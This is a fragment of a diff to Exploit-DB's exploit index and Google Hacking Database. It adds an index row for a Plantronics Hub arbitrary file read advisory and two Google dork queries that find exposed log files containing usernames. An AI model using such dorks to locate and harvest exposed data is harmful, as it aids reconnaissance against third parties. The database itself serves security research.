 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,,2020-01-17,2020-01-17,1,CVE-2019-15742,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,,2020-01-17,2020-01-17,1,CVE-2019-15742,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
+52011,exploits/windows/local/52011.txt,"Plantronics Hub 3.25.1 - Arbitrary File Read",2024-05-13,"Alaa Kachouh",local,windows,,2024-05-13,2024-05-13,0,,,,,,
 9379,exploits/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,local,windows,,2009-08-05,,1,OSVDB-55802,,,,,
 17166,exploits/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Local Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",local,windows,,2011-04-13,2011-04-14,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-14-at-31237-pm.png,http://www.exploit-db.complaylistmaker15.zip,
 9466,exploits/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,local,windows,,2009-08-17,,1,,,,,,
diff --git a/ghdb.xml b/ghdb.xml
index 1a585719f5..9016b31765 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -65470,6 +65470,18 @@ Dxtroyer</textualDescription>
   <date>2020-10-21</date>
   <author>Alexandros Pappas</author>
  </entry>
+ <entry>
+  <id>8440</id>
+  <link>https://www.exploit-db.com/ghdb/8440</link>
+  <category>Files Containing Usernames</category>
+  <shortDescription>&quot;Header for logs at time&quot; ext:log</shortDescription>
+  <textualDescription>&quot;Header for logs at time&quot; ext:log</textualDescription>
+  <query>&quot;Header for logs at time&quot; ext:log</query>
+  <querystring>https://www.google.com/search?q=&quot;Header for logs at time&quot; ext:log</querystring>
+  <edb></edb>
+  <date>2024-05-13</date>
+  <author>Nadir Boulacheb (RubX)</author>
+ </entry>
  <entry>
   <id>6535</id>
   <link>https://www.exploit-db.com/ghdb/6535</link>
@@ -65505,6 +65517,18 @@ Sahil Saxena
   <date>2004-04-13</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8441</id>
+  <link>https://www.exploit-db.com/ghdb/8441</link>
+  <category>Files Containing Usernames</category>
+  <shortDescription>&quot;START test_database&quot; ext:log</shortDescription>
+  <textualDescription>&quot;START test_database&quot; ext:log</textualDescription>
+  <query>&quot;START test_database&quot; ext:log</query>
+  <querystring>https://www.google.com/search?q=&quot;START test_database&quot; ext:log</querystring>
+  <edb></edb>
+  <date>2024-05-13</date>
+  <author>Nadir Boulacheb (RubX)</author>
+ </entry>
  <entry>
   <id>4858</id>
   <link>https://www.exploit-db.com/ghdb/4858</link>